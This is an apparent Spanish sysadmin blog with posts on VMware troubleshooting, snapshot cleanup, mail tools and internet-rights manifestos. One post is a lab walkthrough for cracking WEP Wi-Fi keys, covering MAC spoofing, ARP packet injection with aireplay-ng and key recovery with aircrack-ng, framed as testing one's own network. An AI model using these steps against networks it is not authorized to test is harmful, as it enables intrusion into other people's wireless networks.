Ya lo se que parece la fricada mas grande del mundo, pero si hoy es nuestro dia y deberian felicitarnos por nuestras horas pringando …..
Un abrazo pa toos
http://www.sysadminday.com/
Dia de los administradores de sistemas o sysadmins
July 30th, 2010
Problemas de caídas continuas del servicio VirtualCenter Server
July 12th, 2010Tras una llamada de emergencia he asistido a un cliente que perdian la posibilidad de administracion de los nodos de ESX.
Problemas:
Su servicio de VCenter se caia cada 5 minutos sin una razón aparente. En concreto el sistema Windows 2003 daba el siguiente mensaje en el visor de sucesos:
Tipo de suceso: Información Origen del suceso: VMware VirtualCenter Server Categoría del suceso: Ninguno Id. suceso: 1000 Fecha: 09/07/2010 Hora: 9:54:57 Usuario: No disponible Equipo: ********* Descripción: No se encuentra la descripción del Id. de suceso ( 1000 ) en el origen ( VMware VirtualCenter Server ). Es posible que el equipo local no tenga la información de Registro o archivos DLL de mensajes necesarios para mostrar mensajes desde un equipo remoto. Es posible que pueda usar el indicador /AUXSOURCE= para recuperar esta descripción; consulte Ayuda y soporte técnico para obtener más detalles. La siguiente información es parte del suceso: Log directory: C:\Documents and Settings\Default User\Configuración local\Datos de programa\VMware\vpx.. Tipo de suceso: InformaciónOrigen del suceso: VMware VirtualCenter ServerCategoría del suceso: NingunoId. suceso: 1000Fecha: 09/07/2010Hora: 9:54:57Usuario: No disponibleEquipo: *******Descripción:No se encuentra la descripción del Id. de suceso ( 1000 ) en el origen ( VMware VirtualCenter Server ). Es posible que el equipo local no tenga la información de Registro o archivos DLL de mensajes necesarios para mostrar mensajes desde un equipo remoto. Es posible que pueda usar el indicador /AUXSOURCE= para recuperar esta descripción; consulte Ayuda y soporte técnico para obtener más detalles. La siguiente información es parte del suceso: Log directory: C:\Documents and Settings\Default User\Configuración local\Datos de programa\VMware\vpx..Laboratorio: Prueba de concepto. Crackear claves WEP usando Backtrack
February 24th, 2010A continuación comparto una prueba de concepto para nuestras redes wifi de tipo WEP. En ningún caso aconsejo usar esto para una red Wifi que no sea de nuestra propiedad.
El CHIP de wireless es el INTEL PRO/Wireless 3945ABG Network
Nota: los comandos os los paso en forma de script para que podáis crear ejecutables con ellos, o sueltos y ejecutáis uno a uno
Comenzamos:
Tenemos que cambiar los drivers de la tarjeta ya que no soportan modo promiscuo. En el backtrack viene unos que nos interesan
Script: “ipw3945i.sh”
#!/bin/bash
echo “[*] Removing IPW3945 drivers”
rmmod ipwraw
rmmod iwl3945
rmmod mac80211
echo “[*] Inserting IPWRAW drivers (raw mode)”
modprobe ipwraw
Lanzamos :
iwconfig
Vemos cual es la tarjeta wifi, en mi caso es wifi0 continuo usandola como ejemplo.
Me cambio la MAC , este es un numero de cada “tarjeta del mundo”. Tambien podemos cambiarnos la MAC para imitar una que este conectada en la nuestra red.
ifconfig wifi0 down
macchanger –mac 00:10:20:30:40:50 wifi0
ifconfig wifi0 up
ifconfig wifi0
En este punto podemos usar “Backtrack->Wireless Tools -> Analyzers ->Kismet” para elegir la red a la que atacar, o usar los comandos:
airmon-ng start wifi0
airodump-ng wifi0
El software este se puede tambien ordenar como el kismet pero la verdad nunca lo he intentado, aconsejo un vistazo al man para ver que tal ….
Una vez elegida la red a la que atacar haces un “CRTL+C” en esa ventana para que pare. Apuntas el bssid (MAC), el essid (NOMBRE) y channel (CANAL).
En otra ventana de shell que abriremos y dejaremos lanzado el comando, para monitorizar esa red elegida para atacarla:
airodump-ng -c $CHANNEL -w $ESSID –bssid $BSSID wifi0
Rellenando los datos de los que hemos recogido antes ($). Si el essid tiene espacios lo pones entre comillas.
En otra venta de shell comenzamos el ataque en si.
Nos asociamos al AP, con el comando rellenado ($) el dato recopilado antes:
aireplay-ng -1 0 -a $BSSID -h 00:10:20:30:40:50 wifi0
Aqui es normalmente cuando puede fallar el invento ya que no le guste nuestra fakeMAC (00:10:20:30:40:50) al AP. Tendremos que cambiarla en caso necesario.
Ahora comenzamos a meterle paquetes rellenado los datos necesarios ($):
aireplay-ng -3 -b $BSSID -h 00:10:20:30:40:50 wifi0
Cabe la posiblidad de que de golpe nos dia algo asi como “notice: got a deauth/disassoc packet. Is the source MAC associated ?" Eso es simplemente que tenemos que volver a lanzar la asociacion en otra shell, porque el router o AP se ha percatado de nuestro ataque y nos ha dado la patadita.
Y si todo es correcto solo nos queda esperar a que los ARP nos vayan subiendo. Es necesario unos 100.000 o 200.000 dependiendo si la pass es de 64bits o 128bits. Esta es la parte de paciencia, si no estuvieramos metiendole paquetes con el aireplay tendriamos que esperar conexiones en la red.
Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets…(499 pps)
Una vez tenemos eso ya veremos que en el sistema tendremos unos ficheros del nombre de la essid con extension “.cap” en el directorio en el que estábamos.
Pues realizamos rellenado los datos ($):
aircrack-ng -n 64 –bssid $BSSID $ESSID.cap
Para crackear una pass 64bit. El resultado nos viene como grupos de 2 separados por “:” quetamos los “:” y el chorizo se lo podemos poner directamente al windows.
aircrack-ng -n 128 –bssid $BSSID $ESSID.cap
Para cargarnos una de 128bit, y el resultado seria el mismo que anteriormente.
El backtrack esta disponible en http://www.remote-exploit.org/
Espero que despues de esto puedas probar la seguridad de tu red y la importancia de usar protocolos más seguros.
A partir de hoy, Red y Libertad
January 12th, 2010Copio/Pego de microsiervos entre otros….
Consideramos imprescindible la retirada de la disposición final primera de la Ley de Economía Sostenible por los siguientes motivos:
- Viola los derechos constitucionales en los que se ha de basar un estado democrático en especial la presunción de inocencia, libertad de expresión, privacidad, inviolabilidad domiciliaria, tutela judicial efectiva, libertad de mercado, protección de consumidoras y consumidores, entre otros.
- Genera para la Internet un estado de excepción en el cual la ciudadanía será tratada mediante procedimientos administrativos sumarísimos reservados por la Audiencia Nacional a narcotraficantes y terroristas.
- Establece un procedimiento punitivo «a la carta» para casos en los que los tribunales ya han manifestado que no constituían delito, implicando incluso la necesidad de modificar al menos 4 leyes, una de ellas orgánica. Esto conlleva un cambio radical en el sistema jurídico y una fuente de inseguridad para el sector de las TIC (Tecnología de la Información y la Comunicación). Recordamos, en este sentido, que el intercambio de conocimiento y cultura en la red es un motor económico importante para salir de la crisis como se ha demostrado ampliamente.
- Los mecanismos preventivos urgentes de los que dispone la ley y la judicatura son para proteger a toda ciudadanía frente a riesgos tan graves como los que afectan a la salud pública. El gobierno pretende utilizar estos mismos mecanismos de protección global para beneficiar intereses particulares frente a la ciudadanía. Además la normativa introducirá el concepto de «lucro indirecto», es decir: a mí me pueden cerrar el blog porque «promocionó» a uno que «promociona» a otro que vincula a un tercero que hace negocios presuntamente ilícitos.
- Recordamos que la propiedad intelectual no es un derecho fundamental contrariamente a las declaraciones del Ministro de Justicia, Francisco Caamaño. Lo que es un derecho fundamental es el derecho a la producción literaria y artística.
- De acuerdo con las declaraciones de la Ministra de Cultura, esta disposición se utilizará exclusivamente para cerrar 200 webs que presuntamente están atentando contra los derechos de autor. Entendemos que si éste es el objetivo de la disposición, no es necesaria, ya que con la legislación actual existen procedimientos que permiten actuar contra webs, incluso con medidas cautelares, cuando presuntamente se esté incumpliendo la legalidad. Por lo que no queda sino recelar de las verdaderas intenciones que la motivan ya que lo único que añade a la legislación actual es el hecho de dejar la ciudadanía en una situación de grave indefensión jurídica en el entorno digital.
- Finalmente consideramos que la propuesta del gobierno no sólo es un despilfarro de recursos sino que será absolutamente ineficaz en sus presuntos propósitos y deja patente la absoluta incapacidad por parte del ejecutivo de entender los tiempos y motores de la Era Digital.
La disposición es una concesión más a la vieja industria del entretenimiento en detrimento de los derechos fundamentales de la ciudadanía en la era digital.
La ciudadanía no puede permitir de ninguna manera que sigan los intentos de vulnerar derechos fundamentales de las personas, sin la debida tutela judicial efectiva, para proteger derechos de menor rango como la propiedad intelectual. Dicha circunstancia ya fue aclarada con el dictado de inconstitucionalidad de la ley Corcuera (o «ley de la patada en la puerta»). El Manifiesto en defensa de los derechos fundamentales en Internet, respaldado por más de 200.000 personas, ya avanzó la reacción y demandas de la ciudadanía antes la perspectiva inaceptable del gobierno.
Para impulsar un definitivo cambio de rumbo y coordinar una respuesta conjunta, el 9 de enero se ha constituido la Red SOStenible, una plataforma representativa de todos los sectores sociedad civil afectados. El objetivo es iniciar una ofensiva para garantizar una regulación del entorno digital que permita expresar todo el potencial de la Red y de la creación cultural respetando las libertades fundamentales.
En este sentido, reconocemos como referencia para el desarrollo de la era digital, la Carta para la innovación, la creatividad y el acceso al conocimiento, un documento de síntesis elaborado por más de cien expertos de 20 países que recoge los principios legales fundamentales que deben inspirar este nuevo horizonte.
En particular, consideramos que en estos momentos es especialmente urgentes la implementación por parte de gobiernos e instituciones competentes, de los siguientes aspectos recogidos en la Carta:
- Los artistas como todos los trabajadores tienen que poder vivir de su trabajo (referencia punto 2 «Demandas legales», párrafo B. «Estímulo de la creatividad y la innovación», de la Carta);
- La sociedad necesita para su desarrollo de una red abierta y libre (referencia punto 2 «Demandas legales», párrafo D, «Acceso a las infraestructuras tecnológicas», de la Carta);
- El derecho a cita y el derecho a compartir tienen que ser potenciado y no limitado como fundamento de toda posibilidad de información y constitutivo de todo conocimiento (referencia punto 2 «Demandas legales», párrafo A, «Derechos en un contexto digital», de la Carta);
- La ciudadanía debe poder disfrutar libremente de los derechos exclusivos de los bienes públicos que se pagan con su dinero, con el dinero publico (referencia punto 2 «Demandas legales», párrafo C, «Conocimiento común y dominio público», de la Carta);
- Consideramos necesaria una reforma en profundidad del sistema de las entidades de gestión y la abolición del canon digital (referencia punto 2 «Demandas legales«, párrafo B, «Estímulo de la creatividad y la innovación», de la Carta).
Por todo ello hoy se inicia la campaña Internet no será otra tele y se llevarán a cabo diversas acciones ciudadanas durante todo el periodo de la presidencia española de la UE.
Consideramos particularmente importantes en el calendario de la presidencia de turno española el II Congreso de Economía de la Cultura (29 y 30 de marzo en Barcelona), Reunión Informal de ministros de Cultura (30 y 31 de marzo en Barcelona) y la reunión de ministros de Telecomunicaciones (18 a 20 de abril en Granada).
La Red tiene pre
visto reunirse con representantes nacionales e internacionales de partidos políticos, representantes de la cultura y delegaciones diplomáticas.
Firmado: Red SOStenible. La Red SOStenible somos todos. Si quieres adherirte a este texto, cópialo, bloguéalo, difúndelo.
Manifiesto “En defensa de los derechos fundamentales en internet”
December 2nd, 2009Me parece increíble… donde esta mi derecho a la inocencia, donde esta el articulo de la constitución donde se impide que entidades privadas asuman autoridades de entidades públicas, donde esta mi libertad, donde esta el derecho de los no representados por la SGAE, donde esta el derecho de los pequeños artistas a los que la SGAE no les da ni limosna, donde esta la libertad de expresión.
Señores el mundo evoluciona, los modelos de negocio también. Los artistas que de veras se pueden llamar así, deben optar por otros medios de distribución donde realmente seguirán ganando dinero y no pagando a esos usureros que lo único que intentan es no perder su poder, y encima se esconden detrás de ellos haciéndoles dar la cara. A estos últimos les aconsejo reorientar sus negocios renovarse o morir, y si no se lo digan a los obreros de la construcción.
Hay que buscar una solución basada en una nueva orientación de este negocio adaptándose al tiempo en el que vivimos y no al pasado,consensuada y bien pensad. Y acabar con las imposiciones totalitaristas. Como esto siga asi dentro de poco terminaremos con “Guantánamos” digitales en nuestros ordenadores, y viviendo como en China. Al que levante la cabeza le aplasta la industria y su arma la SGAE.
http://www.xataka.com/xataka/en-defensa-de-los-derechos-de-los-ciudadanos-en-internet#c302031
Ante la inclusión en el Anteproyecto de Ley de Economía sostenible de modificaciones legislativas que afectan al libre ejercicio de las libertades de expresión, información y el derecho de acceso a la cultura a través de Internet, los periodistas, bloggers, usuarios, profesionales y creadores de internet manifestamos nuestra firme oposición al proyecto, y declaramos que…
1.- Los derechos de autor no pueden situarse por encima de los derechos fundamentales de los ciudadanos, como el derecho a la privacidad, a la seguridad, a la presunción de inocencia, a la tutela judicial efectiva y a la libertad de expresión.
2.- La suspensión de derechos fundamentales es y debe seguir siendo competencia exclusiva del poder judicial. Ni un cierre sin sentencia. Este anteproyecto, en contra de lo establecido en el artículo 20.5 de la Constitución, pone en manos de un órgano no judicial – un organismo dependiente del ministerio de Cultura -, la potestad de impedir a los ciudadanos españoles el acceso a cualquier página web.
3.- La nueva legislación creará inseguridad jurídica en todo el sector tecnológico español, perjudicando uno de los pocos campos de desarrollo y futuro de nuestra economía, entorpeciendo la creación de empresas, introduciendo trabas a la libre competencia y ralentizando su proyección internacional.
4.- La nueva legislación propuesta amenaza a los nuevos creadores y entorpece la creación cultural. Con Internet y los sucesivos avances tecnológicos se ha democratizado extraordinariamente la creación y emisión de contenidos de todo tipo, que ya no provienen prevalentemente de las industrias culturales tradicionales, sino de multitud de fuentes diferentes.
5.- Los autores, como todos los trabajadores, tienen derecho a vivir de su trabajo con nuevas ideas creativas, modelos de negocio y actividades asociadas a sus creaciones. Intentar sostener con cambios legislativos a una industria obsoleta que no sabe adaptarse a este nuevo entorno no es ni justo ni realista. Si su modelo de negocio se basaba en el control de las copias de las obras y en Internet no es posible sin vulnerar derechos fundamentales, deberían buscar otro modelo.
6.- Consideramos que las industrias culturales necesitan para sobrevivir alternativas modernas, eficaces, creíbles y asequibles y que se adecuen a los nuevos usos sociales, en lugar de limitaciones tan desproporcionadas como ineficaces para el fin que dicen perseguir.
7.- Internet debe funcionar de forma libre y sin interferencias políticas auspiciadas por sectores que pretenden perpetuar obsoletos modelos de negocio e imposibilitar que el saber humano siga siendo libre.
8.- Exigimos que el Gobierno garantice por ley la neutralidad de la Red en España, ante cualquier presión que pueda producirse, como marco para el desarrollo de una economía sostenible y realista de cara al futuro.
9.- Proponemos una verdadera reforma del derecho de propiedad intelectual orientada a su fin: devolver a la sociedad el conocimiento, promover el dominio público y limitar los abusos de las entidades gestoras.
10.- En democracia las leyes y sus modificaciones deben aprobarse tras el oportuno debate público y habiendo consultado previamente a todas las partes implicadas. No es de recibo que se realicen cambios legislativos que afectan a derechos fundamentales en una ley no orgánica y que versa sobre otra materia.
Borrar todos los Snapshots de VMware ESX 4.0 anteriores a X días.
November 23rd, 2009En VMware se pueden programar tareas, pero no todas las tareas son programables, por el entorno gráfico. Es muy sencillo hacer snapshot periódicos, pero borrarlos no nos aparece como opción. En este punto entra en juego usar herramientas como el PowerShell de Microsoft con el VMware Vsphere PowerCLI.
Una vez instalados ambos productos podemos ejecutar comandos mas allá de la configuración disponible por el entorno gráfico. Un ejemplo es para realizar lo que nombramos en esta entrada.
$VC = Connect-VIServer (Read-Host "VC Server")
$AllVirtualMachines = Get-VM
foreach ($VirtualMachine in $AllVirtualMachines)
{$AllSnapshots=Get-Snapshot -VM $VirtualMachine | Where { $_.Created -lt (Get-Date).AddDays(-7)}
foreach ($Snapshot in $AllSnapshots)
{If ($Snapshot.ID -like "VirtualMachineSnapshot-*")
{Write-Host $VirtualMachine.Name, $Snapshot.Name, $Snapshot.Description, $Snapshot.Created
Remove-Snapshot -snapshot $Snapshot –Confirm } } }
Al ejecutar este script lo primero que nos solicita es la IP o el nombre del Vcenter o ESX al que conectarse, y posteriormente nos pedirá confirmación para ir borrando los snapshot.
Haciendo unas pequeñas modificaciones en la primera línea que se realiza la conexión al servidor, podemos obtener que esta se realice automáticamente.
En la cuarta línea encontramos el contador de días que nos permite solo borrar snapshot anteriores a 7 días, modificando este parámetro podemos obtener cualquier antigüedad solicitada.
En la ultima línea podemos modificar “-Confirm” por “-Confirm:$false” e impedir que nos pregunte por verificacion a la hora de borrar. Solo os aconsejo esto cuando ya esteis seguros que el script realiza lo pretendido.
Espero que este script le sea de utilidad a alguien, solo comentaros que no soy el autor de este al 100% simplemente me lo he refrito a mi gusto.
Cluster ESX vmware 4.0 "no management network redundancy"
August 27th, 2009Durante la instalación y creación de un cluster de vmware me encontré con el siguiente mensaje “Node XXXX no management network redundancy" en el summary de situación del cluster. Además me ponía un símbolo de alerta sobre el icono del cluster formado.
Tras investigar un poco descubrí que claro era normal ya que la interfaz virtual del la Service Console solo apuntaba a una interfaz física.
Cuando di de alta el Vswitch distributed, quite el Vswitch y metí ambas interfaces y las configure el sistema seguía quejándose y yo seguía sin entender porque ya que la redundancia estaba disponible.
Finalmente la solución fue tan tonta como, en las propiedades del cluster desactivar el servicio de HA y volverlo activar.
Activar las quotas de uso del correo de usuarios en Messanging server
August 20th, 2009El servidor puede avisar automáticamente a los usuarios que están excediendo su cuota de uso del correo, tanto a nivel de número de mensajes, como a nivel de capacidad total. Para ello debemos establecer los siguientes parámetros:
/opt/sun/comms/messaging64/sbin/configutil -o store.quotanotification = yes
Activamos la notificación.
/opt/sun/comms/messaging64/sbin/configutil -o store.quotaexceededmsginterval = 1
Establecemos cuantas veces al dia se enviara este mensaje.
Usar ImapSync para copiar cuentas de correo
August 20th, 2009Este procedimiento consiste en usar un software libre de terceros, conectando la cuenta del antiguo servidor del usuarios, con la cuenta en el servidor nuevo de dicho usuario, y pasar los datos de una a la otra. El problema es que necesitaremos la password del usuario o modificársela previamente. Es una opción interesante para re sincronizar ciertos usuarios.
Un ejemplo podemos verlo en el comando:
imapsync –host1 srvmail_old.example.com –user1 test1 –password1 sturm –host2 srvmail01.example.com –user2 test2 –password2 proves2 –syncinternaldates –noauthmd5 –split1 5000 –split2 5000
Para conseguir este software podremos realizarlo en la url:
http://freshmeat.net/projects/imapsync/
Apunte rápido, matar procesos con elementos en común.
July 23rd, 2009Hoy hago un apunte rápido sobre como matar procesos que podamos listar en un mismo grep, sobre el comando ps.
ps -ef | grep <que_buscar>| grep -v grep | awk ‘{ print $2 }’ | xargs kill -9
Dentro del grep podemos poner cualquier cosa que tengan los procesos en común. Si no siempre existirá el pkill.
